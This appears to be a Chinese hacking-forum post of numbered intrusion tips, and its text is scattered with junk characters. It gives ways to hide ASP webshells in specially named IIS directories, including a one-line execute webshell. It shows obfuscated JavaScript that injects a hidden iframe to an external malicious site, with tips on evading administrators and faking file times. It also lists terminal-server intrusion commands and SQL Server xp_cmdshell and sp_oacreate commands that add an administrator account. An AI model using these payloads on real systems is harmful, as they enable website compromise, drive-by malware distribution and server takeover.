( \4 u* y! n- u6 @( a8 c53、隐藏ASP后门的两种方法2 N' b3 \5 ~% H- V, l8 ~, ?4 A; P
1、建立非标准目录:mkdir images..\/ m- O4 q) g% o8 ?" D/ U
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
: Q+ W: O# D; T8 X1 s2 ^通过web访问ASP木马:http://ip/images../news.asp?action=login
3 P+ a, ]3 l6 N& Q) j( c如何删除非标准目录:rmdir images..\ /s2 M* k9 x7 N/ A- v! j( N0 G
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:1 M* X; Y( n9 w6 h% I
mkdir programme.asp
Q e5 G9 Q7 V5 B1 `& M2 d: q$ h: b! p新建1.txt文件内容:<!--#include file=”12.jpg”-->
. Z9 g- }7 Y2 m% d: b新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件% Y. n# p+ I! m% l
attrib +H +S programme.asp/ c7 ]$ Z. ~& e4 W
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
( ?1 _: [ ?9 @$ d, X
+ D h# m5 l4 E6 ?7 n7 R54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, L- V0 p/ [- T8 N' ~2 B: d然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
3 E+ t: D3 H- [, e) X$ [& Z( S+ h+ T8 N1 f+ n- T, b- c( x, t, [
55、JS隐蔽挂马' c& ]( C% `5 B# u0 z6 F! P) B' R
1.
# i9 S. _) D5 k( zvar tr4c3="<iframe src=ht";6 m0 L# D# d8 g! M, C
tr4c3 = tr4c3+"tp:/";( i6 T' g' I$ d+ u/ m3 G
tr4c3 = tr4c3+"/ww";1 Y: @9 _$ V( A- T/ b9 N
tr4c3 = tr4c3+"w.tr4";
8 \5 r4 B9 @% w) p6 M! r5 Ztr4c3 = tr4c3+"c3.com/inc/m";
4 a, U9 t N* r: J: A& v3 `tr4c3 = tr4c3+"m.htm style="display:none"></i";! l4 S, Z& ~2 [5 _, K! e
tr4c3 =tr4c3+"frame>'";
2 `4 M, E9 b8 N, K* U! kdocument.write(tr4c3);8 h3 q1 }( X* ?: O
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
& i( r4 n5 b1 d% w4 N& r6 i
$ A; `% ^ M% P8 e; `2.5 k/ Z- D2 a; ?, s% l. y
转换进制,然后用EVAL执行。如
% m5 E2 V4 v, }& v) Weval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
/ j9 z1 C, ~" ?: S不过这个有点显眼。
: t% C3 u! b7 R- V1 c3.* b h. m* r- E9 U" c7 w
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ _7 b9 M8 G" e+ ~
最后一点,别忘了把文件的时间也修改下。
+ U; F+ Y* N0 s6 L; O( O0 b% B! R8 Q5 H
56.3389终端入侵常用DOS命令
4 K6 n$ k6 F& w" G1 _! Htaskkill taskkill /PID 1248 /t% }# g1 y( z, _9 \
* Q3 E/ j1 u8 c( Y/ g: E) g
tasklist 查进程
7 q0 T. ] j& P
5 ?2 q) y: d( u: J2 `cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 c8 y6 c% _. b) \- Y- r3 _% liisreset /reboot: W! I% {' y: r" K9 M+ F: w: U, n
tsshutdn /reboot /delay:1 重起服务器
, D2 h9 n6 A: o2 B& y- q* W) C; J% F+ l
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 m# p" L) A, p7 T8 F
- B8 \( P* [; e0 [* c/ Y( P1 t. squery user 查看当前终端用户在线情况
* p: |% r v1 O F: l* q! Z* x2 t z, s& G
要显示有关所有会话使用的进程的信息,请键入:query process *
! R7 m$ s" B- k! x& q5 q
, L+ |; f! p/ t9 N8 ^要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
) D) g4 q H0 i: A% Y
9 e8 V. ^2 O4 `) N3 X要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
" E% m/ C! D7 D3 }; S; k" @7 e8 m! g" d' ]8 s' Y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
9 K7 h& {- C# ~% a- N ]- C* G9 g6 m( ]" P0 K
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
( T; U z& Y: a2 P t- \6 c9 R" h# ?6 v; _. q' U; j
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
/ u, O; R' Y8 B( B6 c2 W. S) q+ ]% o: F3 Z
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。- }+ o7 }; F" o. _( B
" m! ^; c9 l6 j8 R5 V. O命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
. J( ~1 }2 t& ^. |* F8 |
; m' t& Z' x" `# {/ {56、在地址栏或按Ctrl+O,输入:* I3 P! d% o8 r: [4 F
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
. B( f' E9 \0 q l+ _* H
' h5 Y- j5 f: W" Q( H3 `- V8 _源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。4 j( Z1 T2 C7 E" k k5 Y
( T }% z. m6 m. l7 a57、net user的时候,是不能显示加$的用户,但是如果不处理的话,+ e: Y2 Z g- u3 n1 N% |
用net localgroup administrators是可以看到管理组下,加了$的用户的。; i& c7 r1 E y; m/ S& T3 ~
. l: _, [& a) T; c: V58、 sa弱口令相关命令
z! H0 S& Q$ I5 V2 }# S3 [: W: W% D
一.更改sa口令方法:
0 a3 Z. n2 U- E6 Q) e w用sql综合利用工具连接后,执行命令:
* l+ e) A- ]$ F. I/ D, J& Kexec sp_password NULL,'20001001','sa'" C$ m7 _6 g) u0 x
(提示:慎用!)7 S# }1 X$ p9 r. Z
: n& H8 {/ ^$ _3 i
二.简单修补sa弱口令.9 P& E& W) k4 a. ]' a+ H( i
; _( h9 z3 M$ Z$ Z9 Z8 ]( l- X: L3 }
方法1:查询分离器连接后执行:( Y5 x% T* Z4 x! H P. I* k
if exists (select * from0 a. L4 t: S j0 r4 W' D/ \1 L) I4 Z
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and' ]: z7 {& |8 G. t3 J W. z
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
* h0 j1 u8 q" L0 m @6 ^0 m5 Q& E
! D0 Z4 H3 g. ?% a! t2 k) s# \exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'7 I6 c. Y, \) ^. v* [
0 J9 p- Q0 A+ Y
GO; M# t1 R1 A* {$ V6 m0 T7 j4 [
6 O+ m6 |% \9 O8 f( P$ `$ U然后按F5键命令执行完毕
; N0 p# G9 O; N$ v6 Q- `) m& z( Q! A1 { r5 J7 ^" i+ ]( `
方法2:查询分离器连接后
* t( Q4 k/ o9 u4 y1 t第一步执行:use master
1 P& S# I& X1 L, A9 k1 t第二步执行:sp_dropextendedproc 'xp_cmdshell'2 b8 k8 r$ s+ o! X$ P( Q
然后按F5键命令执行完毕, s+ y+ y% `8 Q7 P, ]* y
1 D. h4 m! a3 D7 c2 ^0 l3 u$ ~" w( H/ k0 k5 p. z$ `: P e: [ a' |/ _
三.常见情况恢复执行xp_cmdshell.
' [5 a! I" Z! |
) N# S+ J1 K+ @$ r1 f1 x6 `' B" i3 @4 L9 j" A: S7 C
1 未能找到存储过程'master..xpcmdshell'.% ^' L. n& j7 H' Y; `" i, q( \! E8 t
恢复方法:查询分离器连接后,
3 t4 X& w, s! F/ L' W; t; D第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; a3 S9 |1 j3 f$ ^7 _8 I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 t! V; t- W4 ?3 Z9 V( m8 W
然后按F5键命令执行完毕
5 V# i6 x/ j6 L3 `% l0 T1 @1 B" K5 t
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) D3 X @; a# s/ L9 M- l; y
恢复方法:查询分离器连接后,
5 m+ |! e4 P2 v$ V0 k第一步执行:sp_dropextendedproc "xp_cmdshell"
2 R$ V2 [$ T# ~1 m c* [' q* ?5 a第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
' s, [& h7 f, L0 V4 y9 i然后按F5键命令执行完毕3 _6 W P3 C, _/ C9 s% Y
% N; H/ Z2 d. C4 C, S
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)& m7 q3 h! @0 }2 o
恢复方法:查询分离器连接后,0 X" D. N/ X1 L/ ?7 r8 y5 p
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
5 j5 U& d8 e% ?/ j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 h+ U1 Y' t S( V5 O6 c& k+ O然后按F5键命令执行完毕
8 K5 g9 v7 B, q4 D& z+ ^: _# ~ z1 i. A0 p0 ^
四.终极方法.
* ~+ d% H, r; e) I; g. x1 G; T- v( J1 M如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 e9 e1 J N( q e# U% j查询分离器连接后,
4 K, L, t2 O0 D* [% m8 }0 Q2000servser系统:6 ~9 N# c' y& @# ^+ j( G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ y' X1 f6 y+ ]1 Q, Y
- {/ l a' H" j Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 G4 L8 P8 d! P# ]+ o- H' ]
. x; k# L: g% R- j" n; ]xp或2003server系统:' h; ~8 n1 B$ D. W( @5 ?3 |& w6 F5 h
' y5 [: c- D' _" [3 \% M! [7 Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
7 o" x. f! \& D5 e/ t: R3 r m
( i a7 ~% H% Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 A4 W; }4 d q, @ |
发表于 2012-9-15 14:51:03
收藏
支持
反对